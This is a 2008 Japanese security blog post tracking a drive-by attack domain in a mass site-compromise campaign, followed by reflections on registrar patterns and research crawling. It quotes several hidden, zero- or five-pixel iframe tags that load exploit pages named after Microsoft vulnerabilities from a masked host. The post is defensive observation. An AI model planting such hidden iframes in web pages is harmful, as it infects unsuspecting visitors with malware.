cNotes 検索 一覧 カテゴリ

www.nihaorr1.com

Published: 2008/04/20

発見、抽出の仕組みは、まぁまぁうまく動いている感じで、これは414151とnmidahena.comの直系の例がまた新たに登場です。こいつはわかりやすく同一のレジストラが利用されています。仕組みはまったく同じですが、iframeのバリエーションが若干変わった感じですかね。まぁ結果的にはいつもと同様の3つほどのバイナリにたどり着くのですが、、、

 <iframe width=""5"" height=""5"" src=""http://www.****.com/Real.gif""></iframe>") 
 <iframe width=""5"" height=""5"" src=""http://www.****.com/Yahoo.php""></iframe>")
 <iframe width=""5"" height=""5"" src=""http://www.****.com/cuteqq.htm""></iframe>")  
 <iframe width=""5"" height=""5"" src=""http://www.****.com/Ms07055.htm""></iframe>")  
 <iframe width=""5"" height=""5"" src=""http://www.****.com/Ms07033.htm""></iframe>") 
 <iframe width=""5"" height=""5"" src=""http://www.****.com/Ms07018.htm""></iframe>") 
 <iframe width=""5"" height=""5"" src=""http://www.****.com/Ms07004.htm""></iframe>")
 <iframe width=""0"" height=""0"" src=""http://www.****.com/Ajax.htm""></iframe>")
 <iframe width=""0"" height=""0"" src=""http://www.****.com/Ms06014.htm""></iframe>")

レジストラの登録情報も追跡していますが、すでに登録されているドメインの中から新たに使うドメインを選んでいるのではなく、新しいサイト、攻撃を思い立ったときにそれ用のドメインを新たに登録するようですね。

発見抽出方法や仕組みを工夫して作ってやると、不毛なぐらい大量な攻撃サイトを見つけることができるのですが、全pageの何%ぐらいになるのか興味がありますね。というか、たぶん多くの研究者やセキュリティ会社がこういったサイト情報を発見するために、単純なWebクロールを繰り返してインターネットトラフィックを汚しまくっているんだろうと想像していますが、それって、WinnyやshareのようなP2Pアプリケーションの世界でメディアから研究者からマニアにいたるまで、こぞって誰よりも早く新しい流出ファイルを見つけようとした行為と同じなんじゃないかなぁと。こういった情報が素人でも簡単に晒すことができれば対策にもプラスになる面もありますが、こういった場合はたいてい「あの会社がやられたみたい」「次はやられる企業はどこだ?」という下世話な情報を早く見つけることを目的で行われるのでネガティブな感じですね。まぁ、こういったこともセキュリティ意識の向上のための大きな要素と思うべきかもしれませんが。

[カテゴリ:botnet観察日記]

by jyake